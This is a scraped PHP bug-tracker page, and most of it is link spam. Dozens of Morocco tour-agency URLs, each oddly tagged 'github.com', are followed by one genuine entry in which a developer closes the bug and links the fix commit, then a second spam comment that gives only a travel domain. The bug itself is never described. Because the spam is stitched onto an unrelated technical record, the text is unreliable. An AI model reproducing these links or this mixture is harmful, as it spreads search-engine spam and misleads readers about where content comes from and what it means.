(https://morocco-itinerary.com/es/marruecos-viajes/contacto/contacto-1/)github.com

(https://morocco-itinerary.com/es/marruecos-viajes/)github.com

(https://morocco-itinerary.com/)github.com

(https://morocco-itinerary.com/who-we-are/)github.com

(https://morocco-itinerary.com/reviews/)github.com

(https://morocco-itinerary.com/contact-2/)github.com

(https://morocco-itinerary.com/terms-conditions/)github.com

(https://morocco-itinerary.com/morocco-tours-packages-2/)github.com

(https://morocco-itinerary.com/can-i-travel-to-morocco-from-usa/)github.com

(https://morocco-itinerary.com/are-4-or-5-or-7-or-10-days-enough-in-morocco/)github.com

(https://morocco-itinerary.com/what-to-do-in-morocco-for-1-week/)github.com

(https://morocco-itinerary.com/morocco-travel-itinerary-5-days/)github.com

(https://morocco-itinerary.com/moroccan-tour-morocco-trips/)github.com

(https://morocco-itinerary.com/whats-morocco-flag-history/)github.com

(https://morocco-itinerary.com/tour/full-day-tour-from-marrakech-to-ait-benhaddou-kasbah/)github.com

(https://morocco-itinerary.com/tour/private-1-day-excursion-to-essaouira-from-marrakech/)github.com

(https://morocco-itinerary.com/tour/private-1-day-excursion-to-imlil-from-marrakech/)github.com

(https://morocco-itinerary.com/tour/1-day-trip-to-ouzoud-waterfalls/)github.com

(https://morocco-itinerary.com/merzouga-quad-biking-around-desert/)github.com

(https://morocco-itinerary.com/tour-destination/tangier/)github.com

(https://morocco-itinerary.com/tour-destination/marrakech/)github.com

(https://morocco-itinerary.com/tour-destination/fes/)github.com

(https://morocco-itinerary.com/tour/)github.com

(https://morocco-itinerary.com/tour-destination/casablanca/)github.com

(https://morocco-itinerary.com/who-we-are/)github.com

(https://morocco-itinerary.com/reviews/)github.com

(https://morocco-itinerary.com/contact-2/)github.com

(https://morocco-itinerary.com/terms-conditions/)github.com

(https://morocco-itinerary.com/hsb/marokko-reise/)github.com

(https://morocco-itinerary.com/hsb/uber-uns-team/)github.com

(https://morocco-itinerary.com/hsb/marokko-reise/kontakt/)github.com

(https://morocco-itinerary.com/hsb/bewertungen/)github.com

(https://morocco-itinerary.com/hsb/tour-destination/tanger/)github.com

(https://morocco-itinerary.com/hsb/tour-destination/marrakesch/)github.com

(https://morocco-itinerary.com/hsb/tour-destination/fes-hsb/)github.com

(https://morocco-itinerary.com/hsb/tour-destination/casablanca-hsb/)github.com

(https://morocco-itinerary.com/it/casa/viaggi-in-marocco/)github.com

(https://morocco-itinerary.com/it/chi-siamo-il-team/)github.com

(https://morocco-itinerary.com/it/itinerario-di-10-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour-individuale-7-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour-marocco-9-giorni/)github.com

(https://morocco-itinerary.com/it/viaggio-in-marocco-5-giorni/)github.com

(https://morocco-itinerary.com/it/casa/contattateci/)github.com

(https://morocco-itinerary.com/it/recensioni/)github.com

(https://morocco-itinerary.com/it/tour-destination/tanger-it/)github.com

(https://morocco-itinerary.com/it/tour-destination/marrakech-it/)github.com

(https://morocco-itinerary.com/it/tour-destination/fez-2/)github.com

(https://morocco-itinerary.com/it/tour-destination/casablanca-it/)github.com

(https://morocco-itinerary.com/it/tour/)github.com

[2023-05-16 21:09 UTC] nielsdos@php.net

-Status: Verified +Status: Closed -Assigned To: +Assigned To: nielsdos

[2023-05-16 21:09 UTC] nielsdos@php.net

The fix for this bug has been committed.
If you are still experiencing this bug, try to check out latest source from https://github.com/php/php-src and re-test.
Thank you for the report, and for helping us make PHP better.

Fixed in https://github.com/php/php-src/commit/727e26f9f27ed0737fdbf6d2626d37a916e08c22

[2023-07-24 12:29 UTC] hamedmezan20 at gmail dot com

morocco-holiday.com

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Tue Oct 28 14:00:01 2025 UTC